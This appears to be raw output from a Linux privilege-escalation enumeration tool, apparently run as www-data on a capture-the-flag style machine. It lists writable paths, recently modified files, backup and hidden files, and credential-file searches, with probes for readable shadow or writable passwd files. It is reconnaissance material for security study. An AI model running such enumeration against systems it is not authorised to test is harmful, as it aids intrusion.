2023-02-12+11:35:47.3675222700 /var/lib/lxcfs/cgroup/memory/system.slice/polkit.service/cgroup.event_control 2023-02-12+11:35:47.3640197090 /var/lib/lxcfs/cgroup/memory/system.slice/dev-mapper-ubuntu\x2d\x2dvg\x2dswap.swap/cgroup.event_control 2023-02-12+11:35:47.3606448570 /var/lib/lxcfs/cgroup/memory/system.slice/sys-kernel-config.mount/cgroup.event_control 2023-02-12+11:35:47.3571659270 /var/lib/lxcfs/cgroup/memory/system.slice/boot.mount/cgroup.event_control 2023-02-12+11:35:47.3527322630 /var/lib/lxcfs/cgroup/memory/system.slice/nginx.service/cgroup.event_control 2023-02-12+11:35:47.3484020380 /var/lib/lxcfs/cgroup/memory/system.slice/sys-fs-fuse-connections.mount/cgroup.event_control 2023-02-12+11:35:47.3413328120 /var/lib/lxcfs/cgroup/memory/system.slice/cron.service/cgroup.event_control 2023-02-12+11:35:47.3322267170 
/var/lib/lxcfs/cgroup/memory/system.slice/systemd-udevd.service/cgroup.event_control 2023-02-12+11:35:47.3270985900 /var/lib/lxcfs/cgroup/memory/system.slice/systemd-networkd.service/cgroup.event_control 2023-02-12+11:35:47.3233772660 /var/lib/lxcfs/cgroup/memory/system.slice/open-vm-tools.service/cgroup.event_control 2023-02-12+11:35:47.3197360280 /var/lib/lxcfs/cgroup/memory/system.slice/irqbalance.service/cgroup.event_control 2023-02-12+11:35:47.3166884870 /var/lib/lxcfs/cgroup/memory/system.slice/cgroup.event_control 2023-02-12+11:35:47.3126134820 /var/lib/lxcfs/cgroup/memory/user.slice/cgroup.event_control 2023-02-12+11:35:47.3092801180 /var/lib/lxcfs/cgroup/memory/cgroup.event_control 2023-02-08+12:57:17.7808908480 /usr/local/sbin/cleancache.sh 2023-01-13+10:54:47.4696015670 /usr/local/sbin/laurel 2022-11-20+21:59:04.6543265010 /var/www/api/vendor/sabberworm/php-css-parser/bin/quickdump.php 2022-11-20+21:59:04.5303264290 /var/www/api/vendor/bramus/router/demo/index.php 2022-11-20+21:59:04.5303264290 /var/www/api/vendor/bramus/router/README.md 2022-11-20+21:53:41.5014786250 /usr/local/bin/composer ╔══════════╣ Unexpected in root /vmlinuz /initrd.img.old /vmlinuz.old /initrd.img ╔══════════╣ Files (scripts) in /etc/profile.d/ ╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#profiles-files total 36 drwxr-xr-x 2 root root 4096 Feb 6 10:01 . drwxr-xr-x 99 root root 4096 Feb 6 10:02 .. 
-rw-r--r-- 1 root root 96 Sep 27 2019 01-locale-fix.sh -rw-r--r-- 1 root root 1557 Dec 4 2017 Z97-byobu.sh -rwxr-xr-x 1 root root 3417 Jun 3 2020 Z99-cloud-locale-test.sh -rwxr-xr-x 1 root root 873 Jun 3 2020 Z99-cloudinit-warnings.sh -rw-r--r-- 1 root root 835 Feb 23 2022 apps-bin-path.sh -rw-r--r-- 1 root root 664 Apr 2 2018 bash_completion.sh -rw-r--r-- 1 root root 1003 Dec 29 2015 cedilla-portuguese.sh ╔══════════╣ Permissions in init, init.d, systemd, and rc.d ╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#init-init-d-systemd-and-rc-d ═╣ Hashes inside passwd file? ........... No ═╣ Writable passwd file? ................ No ═╣ Credentials in fstab/mtab? ........... No ═╣ Can I read shadow files? ............. No ═╣ Can I read shadow plists? ............ No ═╣ Can I write shadow plists? ........... No ═╣ Can I read opasswd file? ............. No ═╣ Can I write in network-scripts? ...... No ═╣ Can I read root folder? .............. No ╔══════════╣ Searching root files in home dirs (limit 30) /home/ /home/dev/.bash_history /root/ /var/www/html /var/www/starting-page/blog/.next/trace /var/www/starting-page/blog/.next/static /var/www/starting-page/blog/.next/static/Z79wh4kSTt439cxBUytQN /var/www/starting-page/blog/.next/static/Z79wh4kSTt439cxBUytQN/_buildManifest.js /var/www/starting-page/blog/.next/static/Z79wh4kSTt439cxBUytQN/_ssgManifest.js /var/www/starting-page/blog/.next/static/chunks /var/www/starting-page/blog/.next/static/chunks/polyfills-c67a75d1b6f99dc8.js /var/www/starting-page/blog/.next/static/chunks/pages /var/www/starting-page/blog/.next/static/chunks/pages/_app-df511a3677d160f6.js /var/www/starting-page/blog/.next/static/chunks/pages/index-c95e13dd48858e5b.js /var/www/starting-page/blog/.next/static/chunks/pages/_error-dfcfa5bb62767c20.js /var/www/starting-page/blog/.next/static/chunks/main-50de763069eba4b2.js /var/www/starting-page/blog/.next/static/chunks/webpack-ee7e63bc15b31913.js 
/var/www/starting-page/blog/.next/static/chunks/framework-8c5acb0054140387.js /var/www/starting-page/blog/.next/export-marker.json /var/www/starting-page/blog/.next/routes-manifest.json /var/www/starting-page/blog/.next/build-manifest.json /var/www/starting-page/blog/.next/package.json /var/www/starting-page/blog/.next/BUILD_ID /var/www/starting-page/blog/.next/cache/webpack/client-production/1.pack /var/www/starting-page/blog/.next/cache/webpack/client-production/index.pack /var/www/starting-page/blog/.next/cache/webpack/client-production/2.pack /var/www/starting-page/blog/.next/cache/webpack/client-production/0.pack /var/www/starting-page/blog/.next/next-server.js.nft.json /var/www/starting-page/blog/.next/react-loadable-manifest.json /var/www/starting-page/blog/.next/images-manifest.json ╔══════════╣ Searching folders owned by me containing others files on it (limit 100) /var/www /var/www/starting-page/blog/.next /var/www/starting-page/blog/.next/cache/webpack/client-production ╔══════════╣ Readable files belonging to root and readable by me but not world readable ╔══════════╣ Modified interesting files in the last 5mins (limit 100) /var/www/api/vendor/dompdf/dompdf/lib/fonts/dompdf_font_family_cache.php /var/log/syslog /var/log/auth.log
logrotate 3.11.0 ╔══════════╣ Files inside /var/www (limit 20) total 28 drwxr-xr-x 7 www-data www-data 4096 Feb 12 10:54 . drwxr-xr-x 14 root root 4096 Jan 16 09:49 .. drwx------ 4 www-data www-data 4096 Feb 12 10:43 .config drwx------ 3 www-data www-data 4096 Feb 12 10:54 .gnupg drwxr-xr-x 3 www-data www-data 4096 Jan 16 09:49 api drwxr-xr-x 2 root root 4096 Jan 31 14:01 html drwxr-xr-x 3 www-data www-data 4096 Jan 16 09:49 starting-page ╔══════════╣ Files inside others home (limit 20) /home/dev/.bashrc /home/dev/.bash_logout /home/dev/user.txt /home/dev/.profile /var/www/.config/configstore/update-notifier-npm.json /var/www/.config/lxc/config.yml /var/www/starting-page/blog/pages/index.js /var/www/starting-page/blog/package.json /var/www/starting-page/blog/.next/trace /var/www/starting-page/blog/.next/static/Z79wh4kSTt439cxBUytQN/_buildManifest.js /var/www/starting-page/blog/.next/static/Z79wh4kSTt439cxBUytQN/_ssgManifest.js /var/www/starting-page/blog/.next/static/chunks/polyfills-c67a75d1b6f99dc8.js /var/www/starting-page/blog/.next/static/chunks/pages/_app-df511a3677d160f6.js /var/www/starting-page/blog/.next/static/chunks/pages/index-c95e13dd48858e5b.js /var/www/starting-page/blog/.next/static/chunks/pages/_error-dfcfa5bb62767c20.js
/var/www/starting-page/blog/.next/static/chunks/main-50de763069eba4b2.js /var/www/starting-page/blog/.next/static/chunks/webpack-ee7e63bc15b31913.js /var/www/starting-page/blog/.next/static/chunks/framework-8c5acb0054140387.js /var/www/starting-page/blog/.next/export-marker.json /var/www/starting-page/blog/.next/routes-manifest.json grep: write error: Broken pipe ╔══════════╣ Searching installed mail applications ╔══════════╣ Mails (limit 50) ╔══════════╣ Backup files (limited 100) -rw-r--r-- 1 root root 11755 Jan 12 10:12 /usr/share/info/dir.old -rw-r--r-- 1 root root 2746 Jan 23 2020 /usr/share/man/man8/vgcfgbackup.8.gz -rw-r--r-- 1 root root 7867 Nov 7 2016 /usr/share/doc/telnet/README.telnet.old.gz -rw-r--r-- 1 root root 361345 Feb 2 2018 /usr/share/doc/manpages/Changes.old.gz -rwxr-xr-x 1 root root 226 Dec 4 2017 /usr/share/byobu/desktop/byobu.desktop.old -rw-r--r-- 1 root root 217559 Jan 5 18:35 /usr/src/linux-headers-4.15.0-202-generic/.config.old -rw-r--r-- 1 root root 0 Jan 5 18:35 /usr/src/linux-headers-4.15.0-202-generic/include/config/wm831x/backup.h -rw-r--r-- 1 root root 0 Jan 5 18:35 /usr/src/linux-headers-4.15.0-202-generic/include/config/net/team/mode/activebackup.h -rw-r--r-- 1 root root 217559 Nov 28 10:19 /usr/src/linux-headers-4.15.0-201-generic/.config.old -rw-r--r-- 1 root root 0 Nov 28 10:19 /usr/src/linux-headers-4.15.0-201-generic/include/config/wm831x/backup.h -rw-r--r-- 1 root root 0 Nov 28 10:19 /usr/src/linux-headers-4.15.0-201-generic/include/config/net/team/mode/activebackup.h -rw-r--r-- 1 root root 35544 Sep 19 22:14 /usr/lib/open-vm-tools/plugins/vmsvc/libvmbackup.so -rw-r--r-- 1 root root 1802 Aug 15 20:07 /usr/lib/python3/dist-packages/sos/report/plugins/ovirt_engine_backup.py -rw-r--r-- 1 root root 1391 Nov 20 21:44 /usr/lib/python3/dist-packages/sos/report/plugins/__pycache__/ovirt_engine_backup.cpython-36.pyc -rw-r--r-- 1 root root 2765 Aug 6 2020 /etc/apt/sources.list.curtin.old -rw-r--r-- 1 www-data www-data 387580 Nov 20 
22:07 /var/www/starting-page/blog/.next/cache/webpack/client-production/index.pack.old -rw-r--r-- 1 root root 8881 Jan 5 18:35 /lib/modules/4.15.0-202-generic/kernel/drivers/net/team/team_mode_activebackup.ko -rw-r--r-- 1 root root 9081 Jan 5 18:35 /lib/modules/4.15.0-202-generic/kernel/drivers/power/supply/wm831x_backup.ko -rw-r--r-- 1 root root 8881 Nov 28 10:19 /lib/modules/4.15.0-201-generic/kernel/drivers/net/team/team_mode_activebackup.ko -rw-r--r-- 1 root root 9081 Nov 28 10:19 /lib/modules/4.15.0-201-generic/kernel/drivers/power/supply/wm831x_backup.ko ╔══════════╣ Searching tables inside readable .db/.sql/.sqlite files (limit 100) Found /var/lib/mlocate/mlocate.db: regular file, no read permission ╔══════════╣ Web files?(output limit) /var/www/: total 28K drwxr-xr-x 7 www-data www-data 4.0K Feb 12 10:54 . drwxr-xr-x 14 root root 4.0K Jan 16 09:49 .. drwx------ 4 www-data www-data 4.0K Feb 12 10:43 .config drwx------ 3 www-data www-data 4.0K Feb 12 10:54 .gnupg drwxr-xr-x 3 www-data www-data 4.0K Jan 16 09:49 api drwxr-xr-x 2 root root 4.0K Jan 31 14:01 html drwxr-xr-x 3 www-data www-data 4.0K Jan 16 09:49 starting-page ╔══════════╣ All hidden files (not in /sys/ or the ones listed in the previous check) (limit 70) -rw-rw-r-- 1 root root 21858 Feb 8 12:48 /usr/local/lib/x86_64-linux-gnu/perl/5.26.1/auto/Image/ExifTool/.packlist -rw-r--r-- 1 root root 0 Oct 14 2021 /usr/lib/node_modules/npm/.npmrc -rw-r--r-- 1 root root 3274 Nov 4 11:35 /usr/lib/node_modules/npm/.mailmap -rw-r--r-- 1 root root 245 Nov 4 11:35 /usr/lib/node_modules/npm/.licensee.json -rw-r--r-- 1 root root 126 Nov 4 11:35 /usr/lib/node_modules/npm/node_modules/lockfile/.travis.yml -rw-r--r-- 1 root root 54 Nov 4 11:35 /usr/lib/node_modules/npm/node_modules/through/.travis.yml -rw-r--r-- 1 root root 116 Nov 4 11:35 /usr/lib/node_modules/npm/node_modules/mkdirp/node_modules/minimist/.travis.yml -rw-r--r-- 1 root root 84 Nov 4 11:35 
/usr/lib/node_modules/npm/node_modules/smart-buffer/.prettierrc.yaml -rw-r--r-- 1 root root 152 Nov 4 11:35 /usr/lib/node_modules/npm/node_modules/smart-buffer/.travis.yml -rw-r--r-- 1 root root 4770 Nov 4 11:35 /usr/lib/node_modules/npm/node_modules/is-regex/.travis.yml -rw-r--r-- 1 root root 4140 Nov 4 11:35 /usr/lib/node_modules/npm/node_modules/is-regex/.jscs.json -rw-r--r-- 1 root root 48 Nov 4 11:35 /usr/lib/node_modules/npm/node_modules/builtins/.travis.yml -rw-r--r-- 1 root root 715 Nov 4 11:35 /usr/lib/node_modules/npm/node_modules/https-proxy-agent/.editorconfig -rw-r--r-- 1 root root 2935 Nov 4 11:35 /usr/lib/node_modules/npm/node_modules/https-proxy-agent/.eslintrc.js -rw-r--r-- 1 root root 58 Nov 4 11:35 /usr/lib/node_modules/npm/node_modules/sorted-union-stream/.travis.yml -rw-r--r-- 1 root root 113 Nov 4 11:35 /usr/lib/node_modules/npm/node_modules/getpass/.travis.yml -rw-r--r-- 1 root root 1308 Nov 4 11:35 /usr/lib/node_modules/npm/node_modules/stream-iterate/node_modules/readable-stream/.travis.yml -rw-r--r-- 1 root root 60 Nov 4 11:35 /usr/lib/node_modules/npm/node_modules/stream-iterate/.travis.yml -rw-r--r-- 1 root root 562 Nov 4 11:35 /usr/lib/node_modules/npm/node_modules/fast-json-stable-stringify/.eslintrc.yml -rw-r--r-- 1 root root 108 Nov 4 11:35 /usr/lib/node_modules/npm/node_modules/fast-json-stable-stringify/.travis.yml -rw-r--r-- 1 root root 1160 Nov 4 11:35 /usr/lib/node_modules/npm/node_modules/color-name/.eslintrc.json -rw-r--r-- 1 root root 119 Nov 4 11:35 /usr/lib/node_modules/npm/node_modules/prr/.travis.yml -rw-r--r-- 1 root root 58 Nov 4 11:35 /usr/lib/node_modules/npm/node_modules/pumpify/node_modules/pump/.travis.yml -rw-r--r-- 1 root root 68 Nov 4 11:35 /usr/lib/node_modules/npm/node_modules/pumpify/.travis.yml -rw-r--r-- 1 root root 277 Nov 4 11:35 /usr/lib/node_modules/npm/node_modules/worker-farm/.editorconfig -rw-r--r-- 1 root root 127 Nov 4 11:35 /usr/lib/node_modules/npm/node_modules/worker-farm/.travis.yml -rw-r--r-- 
1 root root 84 Nov 4 11:35 /usr/lib/node_modules/npm/node_modules/socks/.prettierrc.yaml -rw-r--r-- 1 root root 185 Nov 4 11:35 /usr/lib/node_modules/npm/node_modules/socks/.travis.yml -rw-r--r-- 1 root root 69 Nov 4 11:35 /usr/lib/node_modules/npm/node_modules/util-promisify/.travis.yml -rw-r--r-- 1 root root 334 Nov 4 11:35 /usr/lib/node_modules/npm/node_modules/retry/.travis.yml -rw-r--r-- 1 root root 286 Nov 4 11:35 /usr/lib/node_modules/npm/node_modules/normalize-package-data/node_modules/resolve/.editorconfig -rw-r--r-- 1 root root 13 Nov 4 11:35 /usr/lib/node_modules/npm/node_modules/normalize-package-data/node_modules/resolve/.eslintignore -rw-r--r-- 1 root root 8082 Nov 4 11:35 /usr/lib/node_modules/npm/node_modules/normalize-package-data/node_modules/resolve/.travis.yml -rw-r--r-- 1 root root 62 Nov 4 11:35 /usr/lib/node_modules/npm/node_modules/stream-each/.travis.yml -rw-r--r-- 1 root root 1308 Nov 4 11:35 /usr/lib/node_modules/npm/node_modules/duplexify/node_modules/readable-stream/.travis.yml -rw-r--r-- 1 root root 65 Nov 4 11:35 /usr/lib/node_modules/npm/node_modules/duplexify/.travis.yml -rw-r--r-- 1 root root 59 Nov 4 11:35 /usr/lib/node_modules/npm/node_modules/JSONStream/.travis.yml -rw-r--r-- 1 root root 3817 Nov 4 11:35 /usr/lib/node_modules/npm/node_modules/node-gyp/.travis.yml -rw-r--r-- 1 root root 193 Nov 4 11:35 /usr/lib/node_modules/npm/node_modules/performance-now/.tm_properties -rw-r--r-- 1 root root 65 Nov 4 11:35 /usr/lib/node_modules/npm/node_modules/performance-now/.travis.yml -rw-r--r-- 1 root root 421 Nov 4 11:35 /usr/lib/node_modules/npm/node_modules/fs-vacuum/.eslintrc -rw-r--r-- 1 root root 215 Nov 4 11:35 /usr/lib/node_modules/npm/node_modules/fs-vacuum/.travis.yml -rw-r--r-- 1 root root 150 Nov 4 11:35 /usr/lib/node_modules/npm/node_modules/isstream/.travis.yml -rw-r--r-- 1 root root 134 Nov 4 11:35 /usr/lib/node_modules/npm/node_modules/mute-stream/.travis.yml -rw-r--r-- 1 root root 38 Oct 14 2021 
/usr/lib/node_modules/npm/node_modules/qrcode-terminal/.travis.yml -rw-r--r-- 1 root root 72 Nov 4 11:35 /usr/lib/node_modules/npm/node_modules/libnpmsearch/.travis.yml -rw-r--r-- 1 root root 189 Nov 4 11:35 /usr/lib/node_modules/npm/node_modules/sshpk/.travis.yml -rw-r--r-- 1 root root 276 Nov 4 11:35 /usr/lib/node_modules/npm/node_modules/define-properties/.editorconfig -rw-r--r-- 1 root root 6986 Nov 4 11:35 /usr/lib/node_modules/npm/node_modules/define-properties/.travis.yml -rw-r--r-- 1 root root 4108 Nov 4 11:35 /usr/lib/node_modules/npm/node_modules/define-properties/.jscs.json -rw-r--r-- 1 root root 178 Nov 4 11:35 /usr/lib/node_modules/npm/node_modules/http-signature/.dir-locals.el -rw-r--r-- 1 root root 36 Nov 4 11:35 /usr/lib/node_modules/npm/node_modules/require-directory/.travis.yml -rw-r--r-- 1 root root 91 Nov 4 11:35 /usr/lib/node_modules/npm/node_modules/har-validator/node_modules/json-schema-traverse/spec/.eslintrc.yml -rw-r--r-- 1 root root 630 Nov 4 11:35 /usr/lib/node_modules/npm/node_modules/har-validator/node_modules/json-schema-traverse/.eslintrc.yml -rw-r--r-- 1 root root 108 Nov 4 11:35 /usr/lib/node_modules/npm/node_modules/har-validator/node_modules/json-schema-traverse/.travis.yml -rw-r--r-- 1 root root 439 Nov 4 11:35 /usr/lib/node_modules/npm/node_modules/har-validator/node_modules/ajv/.tonic_example.js -rw-r--r-- 1 root root 62 Nov 4 11:35 /usr/lib/node_modules/npm/node_modules/har-validator/node_modules/ajv/scripts/.eslintrc.yml -rw-r--r-- 1 root root 1151 Nov 4 11:35 /usr/lib/node_modules/npm/node_modules/is-date-object/.travis.yml -rw-r--r-- 1 root root 2878 Nov 4 11:35 /usr/lib/node_modules/npm/node_modules/is-date-object/.jscs.json -rw-r--r-- 1 root root 48 Nov 4 11:35 /usr/lib/node_modules/npm/node_modules/isarray/.travis.yml -rw-r--r-- 1 root root 77 Nov 4 11:35 /usr/lib/node_modules/npm/node_modules/errno/.travis.yml -rw-r--r-- 1 root root 6 Nov 4 11:35 /usr/lib/node_modules/npm/node_modules/psl/.eslintignore -rw-r--r-- 1 
root root 52 Nov 4 11:35 /usr/lib/node_modules/npm/node_modules/psl/.travis.yml -rw-r--r-- 1 root root 48 Nov 4 11:35 /usr/lib/node_modules/npm/node_modules/typedarray/.travis.yml -rw-r--r-- 1 root root 72 Nov 4 11:35 /usr/lib/node_modules/npm/node_modules/libnpmorg/.travis.yml -rw-r--r-- 1 root root 66 Nov 4 11:35 /usr/lib/node_modules/npm/node_modules/validate-npm-package-name/.travis.yml -rw-r--r-- 1 root root 43 Nov 4 11:35 /usr/lib/node_modules/npm/node_modules/archy/.travis.yml -rw-r--r-- 1 root root 1308 Nov 4 11:35 /usr/lib/node_modules/npm/node_modules/through2/node_modules/readable-stream/.travis.yml -rw-r--r-- 1 root root 309 Nov 4 11:35 /usr/lib/node_modules/npm/node_modules/agent-base/.travis.yml -rw-r--r-- 1 root root 72 Nov 4 11:35 /usr/lib/node_modules/npm/node_modules/libnpmpublish/.travis.yml grep: write error: Broken pipe grep: write error: Broken pipe ╔══════════╣ Readable files inside /tmp, /var/tmp, /private/tmp, /private/var/at/tmp, /private/var/tmp, and backup folders (limit 70) -rw-r--r-- 1 root root 32707 Jan 13 10:52 /var/backups/apt.extended_states.0 -rw-r--r-- 1 root root 3743 Nov 20 22:36 /var/backups/apt.extended_states.3.gz -rw-r--r-- 1 root root 3524 Jan 12 10:24 /var/backups/apt.extended_states.1.gz -rw-r--r-- 1 root root 3523 Jan 10 12:46 /var/backups/apt.extended_states.2.gz ╔══════════╣ Interesting writable files owned by me or writable by everyone (not in Home) (max 500) ╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#writable-files /dev/mqueue /dev/shm /run/lock /run/php /run/screen /tmp /tmp/.ICE-unix /tmp/.Test-unix /tmp/.X11-unix /tmp/.XIM-unix /tmp/.font-unix #)You_can_write_even_more_files_inside_last_directory /var/cache/apache2/mod_cache_disk /var/crash /var/lib/lxcfs/cgroup/memory/cgroup.event_control /var/lib/lxcfs/cgroup/memory/system.slice/accounts-daemon.service/cgroup.event_control /var/lib/lxcfs/cgroup/memory/system.slice/acpid.service/cgroup.event_control 
/var/lib/lxcfs/cgroup/memory/system.slice/atd.service/cgroup.event_control /var/lib/lxcfs/cgroup/memory/system.slice/auditd.service/cgroup.event_control /var/lib/lxcfs/cgroup/memory/system.slice/boot.mount/cgroup.event_control /var/lib/lxcfs/cgroup/memory/system.slice/cgroup.event_control /var/lib/lxcfs/cgroup/memory/system.slice/cloud-config.service/cgroup.event_control /var/lib/lxcfs/cgroup/memory/system.slice/cloud-init-local.service/cgroup.event_control /var/lib/lxcfs/cgroup/memory/system.slice/cron.service/cgroup.event_control /var/lib/lxcfs/cgroup/memory/system.slice/dbus.service/cgroup.event_control /var/lib/lxcfs/cgroup/memory/system.slice/dev-hugepages.mount/cgroup.event_control /var/lib/lxcfs/cgroup/memory/system.slice/dev-mapper-ubuntux2dx2dvgx2dswap.swap/cgroup.event_control /var/lib/lxcfs/cgroup/memory/system.slice/dev-mqueue.mount/cgroup.event_control /var/lib/lxcfs/cgroup/memory/system.slice/ifup@eth0.service/cgroup.event_control /var/lib/lxcfs/cgroup/memory/system.slice/irqbalance.service/cgroup.event_control /var/lib/lxcfs/cgroup/memory/system.slice/lvm2-lvmetad.service/cgroup.event_control /var/lib/lxcfs/cgroup/memory/system.slice/lxcfs.service/cgroup.event_control /var/lib/lxcfs/cgroup/memory/system.slice/lxd.socket/cgroup.event_control /var/lib/lxcfs/cgroup/memory/system.slice/networkd-dispatcher.service/cgroup.event_control /var/lib/lxcfs/cgroup/memory/system.slice/nginx.service/cgroup.event_control /var/lib/lxcfs/cgroup/memory/system.slice/open-vm-tools.service/cgroup.event_control /var/lib/lxcfs/cgroup/memory/system.slice/php7.4-fpm.service/cgroup.event_control /var/lib/lxcfs/cgroup/memory/system.slice/polkit.service/cgroup.event_control /var/lib/lxcfs/cgroup/memory/system.slice/proc-sys-fs-binfmt_misc.mount/cgroup.event_control /var/lib/lxcfs/cgroup/memory/system.slice/rsyslog.service/cgroup.event_control /var/lib/lxcfs/cgroup/memory/system.slice/snapd.seeded.service/cgroup.event_control 
/var/lib/lxcfs/cgroup/memory/system.slice/snapd.socket/cgroup.event_control /var/lib/lxcfs/cgroup/memory/system.slice/ssh.service/cgroup.event_control /var/lib/lxcfs/cgroup/memory/system.slice/starting-page.service/cgroup.event_control /var/lib/lxcfs/cgroup/memory/system.slice/sys-fs-fuse-connections.mount/cgroup.event_control /var/lib/lxcfs/cgroup/memory/system.slice/sys-kernel-config.mount/cgroup.event_control /var/lib/lxcfs/cgroup/memory/system.slice/sys-kernel-debug.mount/cgroup.event_control /var/lib/lxcfs/cgroup/memory/system.slice/system-getty.slice/cgroup.event_control /var/lib/lxcfs/cgroup/memory/system.slice/system-lvm2x2dpvscan.slice/cgroup.event_control /var/lib/lxcfs/cgroup/memory/system.slice/systemd-journald.service/cgroup.event_control /var/lib/lxcfs/cgroup/memory/system.slice/systemd-logind.service/cgroup.event_control /var/lib/lxcfs/cgroup/memory/system.slice/systemd-networkd.service/cgroup.event_control /var/lib/lxcfs/cgroup/memory/system.slice/systemd-resolved.service/cgroup.event_control /var/lib/lxcfs/cgroup/memory/system.slice/systemd-timesyncd.service/cgroup.event_control /var/lib/lxcfs/cgroup/memory/system.slice/systemd-udevd.service/cgroup.event_control /var/lib/lxcfs/cgroup/memory/system.slice/uuidd.service/cgroup.event_control /var/lib/lxcfs/cgroup/memory/system.slice/vgauth.service/cgroup.event_control /var/lib/lxcfs/cgroup/memory/user.slice/cgroup.event_control /var/lib/nginx/body /var/lib/nginx/fastcgi /var/lib/nginx/proxy /var/lib/nginx/scgi /var/lib/nginx/uwsgi /var/lib/php/sessions /var/tmp /var/www ╔══════════╣ Interesting GROUP writable files (not in Home) (max 500) ╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#writable-files ╔══════════╣ Searching passwords in history files treatment of @ARGV elements
  • Minor change to parsing of -@ argfile (comment lines may may no longer have
  • No longer trim trailing spaces from arguments in -@ argfiles
  • Added -password option for processing password-protected PDF documents
  • Added Password option
  • Improved -@ option to allow a UTF-8 BOM at the start of the input file
  • Changed -@ to insert arguments at the current position in the command line
  • Fixed bug introduced in 5.99 which broke the "-tagsFromFile @" feature
  • Fixed problem which generated warnings about symbol "@indent" in Nikon.pm expanded beyond its "Image" roots!)
  • Assume '-TagsFromFile @' for any redirected tags (eg. '-SRCTAG>DSTTAG' or
  • Ignore white space around '=' sign of arguments in '-@' file
  • Fixed problem with new '-tagsFromFile @' feature which occurred when
  • Allow target file to be specified by '@' with -TagsFromFile option
  • Added -@ option and two utility files (iptc2xmp.args and xmp2iptc.args) to ╔══════════╣ Searching *password* or *credential* files in home (limit 70) /bin/systemd-ask-password /bin/systemd-tty-ask-password-agent /etc/pam.d/common-password /usr/lib/git-core/git-credential /usr/lib/git-core/git-credential-cache /usr/lib/git-core/git-credential-cache--daemon /usr/lib/git-core/git-credential-store #)There are more creds/passwds files in the previous parent folder /usr/lib/grub/i386-pc/password.mod /usr/lib/grub/i386-pc/password_pbkdf2.mod /usr/lib/node_modules/npm/lib/config/clear-credentials-by-uri.js /usr/lib/node_modules/npm/lib/config/get-credentials-by-uri.js /usr/lib/node_modules/npm/lib/config/set-credentials-by-uri.js /usr/lib/python3/dist-packages/cloudinit/config/__pycache__/cc_set_passwords.cpython-36.pyc /usr/lib/python3/dist-packages/cloudinit/config/cc_set_passwords.py /usr/lib/python3/dist-packages/oauthlib/oauth2/rfc6749/grant_types/__pycache__/client_credentials.cpython-36.pyc /usr/lib/python3/dist-packages/oauthlib/oauth2/rfc6749/grant_types/__pycache__/resource_owner_password_credentials.cpython-36.pyc /usr/lib/python3/dist-packages/oauthlib/oauth2/rfc6749/grant_types/client_credentials.py /usr/lib/python3/dist-packages/oauthlib/oauth2/rfc6749/grant_types/resource_owner_password_credentials.py /usr/lib/python3/dist-packages/twisted/cred/__pycache__/credentials.cpython-36.pyc /usr/lib/python3/dist-packages/twisted/cred/credentials.py /usr/share/dns/root.key /usr/share/doc/git/contrib/credential /usr/share/doc/git/contrib/credential/gnome-keyring/git-credential-gnome-keyring.c /usr/share/doc/git/contrib/credential/libsecret/git-credential-libsecret.c /usr/share/doc/git/contrib/credential/netrc/git-credential-netrc /usr/share/doc/git/contrib/credential/osxkeychain/git-credential-osxkeychain.c /usr/share/doc/git/contrib/credential/wincred/git-credential-wincred.c /usr/share/man/man1/git-credential-cache--daemon.1.gz 
/usr/share/man/man1/git-credential-cache.1.gz /usr/share/man/man1/git-credential-store.1.gz /usr/share/man/man1/git-credential.1.gz #)There are more creds/passwds files in the previous parent folder /usr/share/man/man7/gitcredentials.7.gz /usr/share/man/man8/systemd-ask-password-console.path.8.gz /usr/share/man/man8/systemd-ask-password-console.service.8.gz /usr/share/man/man8/systemd-ask-password-wall.path.8.gz /usr/share/man/man8/systemd-ask-password-wall.service.8.gz #)There are more creds/passwds files in the previous parent folder /usr/share/pam/common-password.md5sums /var/cache/debconf/passwords.dat /var/lib/cloud/instances/iid-datasource-none/sem/config_set_passwords /var/lib/pam/password /var/www/starting-page/blog/node_modules/caniuse-lite/data/features/credential-management.js /var/www/starting-page/blog/node_modules/caniuse-lite/data/features/passwordrules.js ╔══════════╣ Checking for TTY (sudo/su) passwords in audit logs